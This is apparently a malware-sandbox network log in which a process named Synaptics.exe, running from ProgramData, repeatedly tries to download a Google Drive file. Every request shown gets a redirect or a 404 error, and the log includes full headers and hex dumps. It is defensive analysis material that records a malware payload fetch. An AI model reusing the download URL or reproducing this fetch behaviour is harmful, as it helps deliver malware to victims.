                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.749714142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                                                                                                2024-12-30 09:58:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6NMLRHlDvMCwZgKHVP5rlVmEhMYQ4sLEMPkEYhfyx5db-ZyxVKrkD84OTppLFQVmvoa2NDs3Q
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ORfyBdHrLrMdeY0qdqHFzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4d 76 66 53 46 59 67 58 6a 47 35 64 76 73 66 55 67 6c 51 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="jMvfSFYgXjG5dvsfUglQ6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.749716216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MxGlGe4BEUQwQDGoli4ezQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.749723216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-iK7X0lJQkp6X2_vUllN1kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.749721216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VpdX3cAHUnOdsJos9p2uLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.749724142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5AOL74zv-hlk21_mu6JxTLEASaWA00KGlRxggioFhkrSNgbvC1B6yH_UyI_vR1X4xEN9QCbuc
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Ok5LwymeUelLvwC6aVTEnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 64 42 55 66 35 4b 66 75 57 34 53 67 33 56 74 30 78 43 48 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="AdBUf5KfuW4Sg3Vt0xCHHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.749727142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6XGEDuor3Rsh9ZrXcNbgz8MfekLoJTosk-7HBTA4vzKwT3JPsUaK5ouyhHXwTWp7Y2sOkQsQo
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-xTW9A0qlftiWXYHqlji5Xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 31 32 4e 54 6b 43 46 4c 43 43 47 79 49 59 4f 77 34 49 63 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="j12NTkCFLCCGyIYOw4IcdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.749736216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-lWyhDCae8cGWaube2WQTyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.749737216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BFhqOqHrAJJyypZIdC6Rhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.749739142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
